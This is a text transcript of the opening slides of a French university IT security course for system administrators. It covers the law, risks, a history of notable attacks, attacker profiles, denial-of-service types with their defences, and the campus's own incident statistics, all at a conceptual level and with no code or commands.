SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf ·...

381
Sécurité Informatique [email protected] March 31, 2018 [email protected] Sécurité Informatique/ March 31, 2018 1 / 381

Transcript of SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf ·...

Page 1: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Sécurité Informatique

[email protected]

March 31, 2018

[email protected] Sécurité Informatique/ March 31, 2018 1 / 381

Page 2: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

"Tu es fort petit, très fort, mais tant que je seraisdans le métier, tu ne seras jamais que le second."

The MASK

[email protected] Sécurité Informatique/ March 31, 2018 2 / 381

Page 3: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pirater n’est pas un jeu

Ce que vous apprendrez ici est destiné à la protection, pas àl’attaque. Mais si cela vous amuse :

Certains organismes "anodins" sont sous la protection de laDGSI ou pire...Quand vous réussissez à pirater un organisme c’est parce que

Il ne fait pas de sécuritéIl a une bonne sécurité, mais avec une faille. Il a donc desjournaux qu’il analyse.Vous avez piraté un Honeypot. Bravo vous êtes sousmicroscope.

Accord international G8-24Gel de situation de police à police,Regularisation judiciaire par la suite.

[email protected] Sécurité Informatique/ March 31, 2018 3 / 381

Page 4: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Dura Lex Sed Lex

Accès et maintien :Pénal : Art 323-1 : 30 000 e, 2 ans de prisonsi en plus altération : 45 000 e, 3 ans de prisonsi en plus STAD de l’état : 75 000 e, 5 ans de prison

Entrave au système d’information :Pénal : Art 323-2 : 75 000 e, 5 ans de prison.si en plus STAD de l’état : 100 000 e, 7 ans de prison

Possession d’outils de piratage :Pénal : peines identiques aux infractions "possibles".

[email protected] Sécurité Informatique/ March 31, 2018 4 / 381

Page 5: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Dura Lex Sed Lex : résumé

Pour résumer"Pas vu, Pas prisVu : Niqué !"

[email protected] Sécurité Informatique/ March 31, 2018 5 / 381

Page 6: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Phrases essentielles

"Some rules can be bent,others.... can be broken."Morpheus"Ne pas croire ce que l’on te dit. Toujours re-vérifier" Gibbsrègle n°3"Ne jamais rien prendre pour acquis" Gibbs règle n°8"L’homme intelligent résoud les problèmes, l’homme sage lesévite"

[email protected] Sécurité Informatique/ March 31, 2018 6 / 381

Page 7: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Quel est l’objectif de la sécurité informatique ?

Protéger l’informatique ?Assurer son intégrité ?Assurer sa confidentialité ?Assurer sa disponibilité ?Apporter des preuves ?

Empêcher les accès aux utilisateurs ?

[email protected] Sécurité Informatique/ March 31, 2018 7 / 381

Page 8: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

En-êtes vous sûrs ?

Quelqu’un diffuse du SPAM sous votre nom :Notion d’imagePerte de marchésEt pourtant aucun "dégât informatique"Mais on peut réduire le risque informatiquement

Vol / Destruction d’un serveur ?Protection physique (est-ce votre rôle ?)Sauvegarde

[email protected] Sécurité Informatique/ March 31, 2018 8 / 381

Page 9: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Le bon objectif

Protéger l’entrepriseY compris sa version non informatique

Par des moyens informatiques

Si vous n’en êtes pas convaincus, essayez d’en convaincre vosinterlocuteurs.

[email protected] Sécurité Informatique/ March 31, 2018 9 / 381

Page 10: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Comment faire

EvaluerLes difficultésLe contexteQuels sont les risques ?Quelles sont les menaces ?La sécurité se mesure-t-elle ?

Définir les rôles : politique de sécuritéQui fait quoi, comment et quand ?Qui peut faire quoi, comment et quand ?

Définir un plan d’actionQuelle sont les priorités ?

[email protected] Sécurité Informatique/ March 31, 2018 10 / 381

Page 11: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Évaluer

Les difficultésLe contexteQuels sont les risques ?Quelles sont les menaces ?La sécurité se mesure-t-elle ?

[email protected] Sécurité Informatique/ March 31, 2018 11 / 381

Page 12: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les difficultés

Génère des désagrémentsL’empêcheur de surfer en rond.

Beaucoup de travailNécessite de fortes compétences

en réseau, en système, en droit, et une remise à niveaupermanente

Coûte de l’argentet ne rapporte rien

Pas de reconnaissanceSi ça marche : "A quoi ça sert ?"Sinon : "Vous êtes nuls !"

[email protected] Sécurité Informatique/ March 31, 2018 12 / 381

Page 13: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Le contexte : Internet

HistoriqueConnexion de bout en boutRéseau ouvert

[email protected] Sécurité Informatique/ March 31, 2018 13 / 381

Page 14: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Historique

1962 : Réseau militaire1968 : Premiers tests réseau à paquets1 Octobre 1969 Arpanet(RFC,UNIX)Septembre 1978 : IPv41991 : Création de WWW par Tim Lee Werners1992 : Découverte d’Internet par le grand public

[email protected] Sécurité Informatique/ March 31, 2018 14 / 381

Page 15: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Connexion de bout en bout

les RFC 1122 et 1123 définissent les règles pour les machinesAccessibilité totaleOn fait ce que l’on dit, et l’on dit ce que l’on fait

Signaler quand cela ne marche pasSignaler pourquoi

Système ouvertFingerRexecSendmail

[email protected] Sécurité Informatique/ March 31, 2018 15 / 381

Page 16: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Réseau ouvert

Entraide : prêt de ressourcesSendmail → relayage de spamsDNS → saturation de serveurs distants

Assistance au débogageEXPN et VRFY de sendmail → collecte d’informationsXFER DNS → cartographie de réseaux

[email protected] Sécurité Informatique/ March 31, 2018 16 / 381

Page 17: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les risques

Destruction de donnéesPerte de marchésPerte de temps et donc d’argentRisques juridiques

[email protected] Sécurité Informatique/ March 31, 2018 17 / 381

Page 18: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Destruction de données

ComptabilitéDonnées clientsR & D, Conception, ProductionLes PME meurent dans les 3 mois.

[email protected] Sécurité Informatique/ March 31, 2018 18 / 381

Page 19: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Perte de marché

Vol ou divulgation d’informationRecherche et développementFichier client

Dégradation de l’imageModification du site webDivulgation d’informations (vraies puis fausses)Perte de confiance

[email protected] Sécurité Informatique/ March 31, 2018 19 / 381

Page 20: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pertes financière et boursière

Exemple de Yahoo

[email protected] Sécurité Informatique/ March 31, 2018 20 / 381

Page 21: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pertes financière et boursière

Mais ce n’est pas toujours le cas

[email protected] Sécurité Informatique/ March 31, 2018 21 / 381

Page 22: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pertes financière et boursière

Cause ou conséquence ?

http://riskbasedsecurity.com

[email protected] Sécurité Informatique/ March 31, 2018 22 / 381

Page 23: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Perte de temps et donc d’argent

Arrêt de la productionRecherche des causesRemise en état

[email protected] Sécurité Informatique/ March 31, 2018 23 / 381

Page 24: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Risques juridiques

Lois françaisesEchanges illégaux (terrorisme/pédopornographie/P2P),Attaques par rebond,Confidentialité des données personnelles (Article 226-17 etArticle 226-34),GDPR / RGPD (Directive européenne : 25 Mai 2018).

4% du chiffre d’affaire mondial10-20 millions d’euros pour les administrations

ContratsDisponibilité

Lois internationalesLoi Sarbanes-Oxley (US)Réglementation Bâle II

[email protected] Sécurité Informatique/ March 31, 2018 24 / 381

Page 25: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les menaces : attaques

HistoriqueNiveau des attaquesTypes d’attaqueDéroulement d’une attaque

[email protected] Sécurité Informatique/ March 31, 2018 25 / 381

Page 26: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les attaques : pré-historique

1975 : Jon Postel pressent le SPAM→ 1983 : blagues de potaches1983 : WargamesAoût 1986 : Cukoo’s egg (1989) Clifford Stoll : 1er Honeypot.(0.75$)2 Novembre 1988 : Ver de Morris

10% du parc mondial (6000 sur 60000)Création du CERT

[email protected] Sécurité Informatique/ March 31, 2018 26 / 381

Page 27: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les attaques : historique

2001 : Code Rouge24 janvier 2003 : Slammer

(376 octets)doublait toutes les 2,5 secondes90% des hôtes vulnérables infectés en 10 minutes

2004 : Location de zombies2008 : Les Anonymous commencent leurs attaques

[email protected] Sécurité Informatique/ March 31, 2018 27 / 381

Page 28: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les attaques : contemporain

2009 : Conficker (7%, Militaire, 250 K$, MD6)2010 : Opération Aurora, Mariposa (13 M), Comodo, Stuxnet,etc.2011 : Affaire DigiNoTar (certificat *.google.com),2012 : Pacemakers, Piratage de l’Élysée,2013 : PRISM (Snowden), Backdoor DLink2014 : Cryptolocker, Shellshock(98), Sony, FIN4, Failles SSL(Poodle, Heartbleed)2015 : Cyberdjihadisme, Hacking Team, Full HTTPS, AshleyMadison, Backdoor Cisco2016 : DNC, Méga DDos, IoT, Shadow Brokers2017 : Cryptominers, Equifax, Accenture, AWS public bucket,Wannacry

[email protected] Sécurité Informatique/ March 31, 2018 28 / 381

Page 29: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les attaques : 2018

Meltdown et spectre (Intel, ARM, etc.)Oneplus pownedIntel Powned (AMT)AMD Powned : Backdoor dans les Ryzen et EPIC : Masterkey,Chimera, Fallout, etc.Cisco powned (FW, VPN)Lenovo powned (Fingerprint scanner, wifi)Asus powned (commutateurs)Telegram et U+202EOlympic DestroyerAlerte sur les sites HTTP par chromeMemcached et son Ddos de 1,3 puis 1,7 Tbit/s (5 jours aprèsla découverte du pb).Trustico qui conserve les clés privées, et s’en fait voler 21.000.

[email protected] Sécurité Informatique/ March 31, 2018 29 / 381

Page 30: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Cyberdjihadisme

[email protected] Sécurité Informatique/ March 31, 2018 30 / 381

Page 31: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les attaques : en temps réel

http://map.honeynet.org

[email protected] Sécurité Informatique/ March 31, 2018 31 / 381

Page 32: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les attaques : en temps réel 2

http://cybermap.kaspersky.com

[email protected] Sécurité Informatique/ March 31, 2018 32 / 381

Page 33: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les attaques : en temps différé

http://zone-h.org

[email protected] Sécurité Informatique/ March 31, 2018 33 / 381

Page 34: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les attaques : en temps différé

[email protected] Sécurité Informatique/ March 31, 2018 34 / 381

Page 35: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Les attaques : en devenir

[email protected] Sécurité Informatique/ March 31, 2018 35 / 381

Page 36: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Niveau des attaques

1980 1985 1990 1995 2005 2010 2015

Niveau

Essai de mots de passe

Code Auto-répliquant

Décryptage de mot de passe

Exploitation de vulnérabilités connues

Désactivation des journaux

Backdoor

Exploration de réseau (scan)

Détournement de sessions

Utilisation de SNMP

Interface graphique

Maquillage de paquets Déni de service

Attaques web

Techniques furtives

Obfuscation

Attaques distribuées Réseau C&C P2P

Phishing

Fast Flux

Crypto High tech

[email protected] Sécurité Informatique/ March 31, 2018 36 / 381

Page 37: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Type des attaquants : par compétence

Script Kiddy90% playstation 9% clickomane 1% intelligenceutilise ce que font les autres

AmateurFailles connuesFailles web

ProfessionnelEn équipeAvec beaucoup de moyens (financiers, techniques, parfoispréparatoires)0days possibles, voire courants.

[email protected] Sécurité Informatique/ March 31, 2018 37 / 381

Page 38: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Type des attaquants : par objectif

L’argentpiratage volumétriquecryptolocker "killer application"

Hacktiviste"Terroriste"Anonymous

EspionsEtatiqueIndustriel

"Petit con"

[email protected] Sécurité Informatique/ March 31, 2018 38 / 381

Page 39: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Évolution des attaquants

Ne pas se méprendreLa moyenne des pirates est plus bête qu’avant.Mais les meilleurs pirates sont bien meilleurs qu’avant

plus psychologues (Social Engineering, virus)plus pragmatiques (Efficacité, Argent)plus techniques (Ingénieurs au chômage après éclatement de labulle internet)

[email protected] Sécurité Informatique/ March 31, 2018 39 / 381

Page 40: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

But des attaques

Constitution d’un parc de zombiesCampagne de SPAMsCampagne de phishingCampagne de racket

TagCasseVol (codes bancaires, espionnage, marketing agressif)Spyware, Keylogger, cryptolocker etc.

[email protected] Sécurité Informatique/ March 31, 2018 40 / 381

Page 41: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Économie Virale

[email protected] Sécurité Informatique/ March 31, 2018 41 / 381

Page 42: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Économie Virale : quelques chiffres

Faille inconnue(0 day)Faille iOS 10 payée 1,5 million de $ par Zérodium

Phreaking téléphonique : 2 000 - 70 000 $ par attaque réussie30% des américains ont acheté après un spamROI de "indian herbal" 0,1 cents pour 65 e3,5 $ pour une DoS de 1 heure et de 30 Gbit/sVol d’identité

Perte estimée pour le vol d’une identité : 400 e(bénéfice pourle pirate : entre 50 et 100 e))en 2007, l’estimation des pertes dues à la cybercriminalité étaitde plus de 1 milliard par an.

Depuis 2007 C.A. cybercriminalité >C.A. drogue. 2018 : 600milliards $Pourquoi les sites porno et les sites proxy sont gratuits ?

[email protected] Sécurité Informatique/ March 31, 2018 42 / 381

Page 43: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Proposition d’emploi

Mais actuellement les machines résolvent 99% des captchas.

[email protected] Sécurité Informatique/ March 31, 2018 43 / 381

Page 44: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Prix de failles

https://zerodium.com/program.html

[email protected] Sécurité Informatique/ March 31, 2018 44 / 381

Page 45: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Prix de failles mobile

https://zerodium.com/program.html

[email protected] Sécurité Informatique/ March 31, 2018 45 / 381

Page 46: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Type des attaques

Déni de service (saturation, D.O.S. ou D.D.O.S.)Phishing, spear phishingInfection (cryptolocker, mots de passe bancaires).Piratage webIntrusion réseau (APT)

[email protected] Sécurité Informatique/ March 31, 2018 46 / 381

Page 47: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Attaque D.O.S.

Deny Of Service ou Déni de service. Plusieurs principes defonctionnement

Le harcèlementOccupation permanente de la ligne

Le livreur de pizzasAppel de plusieurs livreurs pour une fausse adresseVoir backscatter pour le repérage

Le chewing gum dans la serrure

[email protected] Sécurité Informatique/ March 31, 2018 47 / 381

Page 48: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Attaque D.D.O.S.

Distributed Deny Of Service ou déni de service distribué.D.O.S. appliqué par plusieurs (dizaines de milliers de) machinesGénéralement de type "livreur de pizzas"Rarement évitable (même par des sociétés spécialisées)Exemple du 7ème spammeur avec 8Gbit/s en 2006.Volume maximal actuel : 1.35 Tbit/s par de serveursmemcached.http://atlas.arbor.net/summary/do

[email protected] Sécurité Informatique/ March 31, 2018 48 / 381

Page 49: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Type de D.O.S.

Saturation de la bande passante (UDP)10000 zombiesImpossible de lutter seul (se "cacher" derrière OVH,CloudFlare)

Saturation de la table des connexions (TCP)1000 zombiesLutte : utilisation des syncookies

Saturation du nombre processus100 zombies mais les machines sont "grillées", connaissanceminimaleLutte : limitation du nombre de processus, repérage et blocagetrès tôt

[email protected] Sécurité Informatique/ March 31, 2018 49 / 381

Page 50: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Type de D.O.S.

Saturation de la CPU10 zombies mais les machines sont "grillées", connaissancespointuesLutte : limitation de la CPU (noyau), mod_evasive (http)

Plantage distant1 zombie. Expertise nécessairePatch régulier, durcissement noyau, protection applicative

[email protected] Sécurité Informatique/ March 31, 2018 50 / 381

Page 51: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Et si kon ve fer mé kon sé pa

source http: // www. ddosservice. com

[email protected] Sécurité Informatique/ March 31, 2018 51 / 381

Page 52: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Piske ma copine me quitte, je DDoS

sourcehttps: // pasillo. renater. fr/ weathermap/ weathermap_metropole. html

[email protected] Sécurité Informatique/ March 31, 2018 52 / 381

Page 53: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La protection DDoS

Elle se prépare, comme toute gestion de crise.Savoir ce que l’on est prêt à sacrifier (ou pas)

En terme de correspondantsEn terme de services

Les procéduresLes concevoir (qui fait quoi comment, les interlocuteurs)Les rédigerLes valider

[email protected] Sécurité Informatique/ March 31, 2018 53 / 381

Page 54: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

La protection DDoS

Elle est multi-niveauxVolumétrique (FAI)Connexion (Réseau)Applicative (Développement)

Elle a ses risques propresPerte localisée de connexion (syncookie)Latence en régime de croisière (limitesCPU/process/RAM/disque)Risque d’interception "high level" : cloudflare / OVH / etc.

[email protected] Sécurité Informatique/ March 31, 2018 54 / 381

Page 55: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Déroulement d’attaque phishing

[email protected] Sécurité Informatique/ March 31, 2018 55 / 381

Page 56: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Déroulement d’attaque infection

[email protected] Sécurité Informatique/ March 31, 2018 56 / 381

Page 57: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Déroulement d’attaque infection / protection

[email protected] Sécurité Informatique/ March 31, 2018 57 / 381

Page 58: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Déroulement d’attaque infection contournement

[email protected] Sécurité Informatique/ March 31, 2018 58 / 381

Page 59: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Déroulement d’attaque intégration botnet

[email protected] Sécurité Informatique/ March 31, 2018 59 / 381

Page 60: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Déroulement d’attaque infection pour Spam/Virus

[email protected] Sécurité Informatique/ March 31, 2018 60 / 381

Page 61: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Déroulement d’attaque infection pour DDoS

[email protected] Sécurité Informatique/ March 31, 2018 61 / 381

Page 62: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Déroulement d’un piratage web

[email protected] Sécurité Informatique/ March 31, 2018 62 / 381

Page 63: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Déroulement d’un piratage réseau

[email protected] Sécurité Informatique/ March 31, 2018 63 / 381

Page 64: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Déroulement d’une attaque intrusion

Collecte d’informationsRepérage des vulnérabilitésUtilisation des vulnérabilités → intrusionAccession aux droits administrateur (escalade)CamouflageInstallation d’une backdoor

[email protected] Sécurité Informatique/ March 31, 2018 64 / 381

Page 65: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Collecte des informations

Par "social engineering" ou manipulation psycho-relationnellePar ingénierie informationnellePar interrogation TCP/IP

Scan (de ports ou de machines)Rapide/lentClassique/furtif

Interrogation des servicesCartographie DNSRécupération des versionsRécupération des options

[email protected] Sécurité Informatique/ March 31, 2018 65 / 381

Page 66: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Attaques : quelques statistiques à l’UT1

Ces chiffres sont des moyennes en 2017200 tests par seconde ( 17 000 000 par jour )1200 scans par jour ( >3 ports ou 10 machines)16 à 2000 machines à chaque fois5 à 10 campagnes de phishing par jour.

[email protected] Sécurité Informatique/ March 31, 2018 66 / 381

Page 67: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Attaques : incidents à l’UT1

67 incidents de sécurité depuis 13 ans dont16 incidents de phishing49 virus (sortants ou crypto) sur des postes2 intrusions automatiques (vers) sur des serveurs1 boite noire piratée (ShellShock)2 "DDoS" réussis en Février 2015.

Année Total Virus Phishing Autres Commentaires2017 8 3 4 1 Parasitisme avancé2016 12 6 1 5 3 DoS, 2 extorsions2015 16 8 4 4 2 DoS2014 17 8 4 52013 10 6 4 0

[email protected] Sécurité Informatique/ March 31, 2018 67 / 381

Page 68: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Attaques : nombre mensuel de tests

lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun.

1 k

2 k

Infractions sur 1 mois

RRDTOOL / TOBI OETIKER

Infractions sortantes par seconde Infractions entrantes par seconde

[email protected] Sécurité Informatique/ March 31, 2018 68 / 381

Page 69: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Attaques : nombre d’attaquants

lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. 0

10 k

20 k

Quarantaine sur 1 mois

RRDTOOL / TOBI OETIKER

Quarantaine en sortie par heure Quarantaine en entree par heure

[email protected] Sécurité Informatique/ March 31, 2018 69 / 381

Page 70: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Attaques : raisons de la quarantaine sur une journée

[email protected] Sécurité Informatique/ March 31, 2018 70 / 381

Page 71: SécuritéInformatique - dsi.ut-capitole.frdsi.ut-capitole.fr/cours/cours_securite_admisys.pdf · "Tu es fort petit, très fort, mais tant que je serais dans le métier, tu ne seras

Pourquoi les services sont vulnérables ?

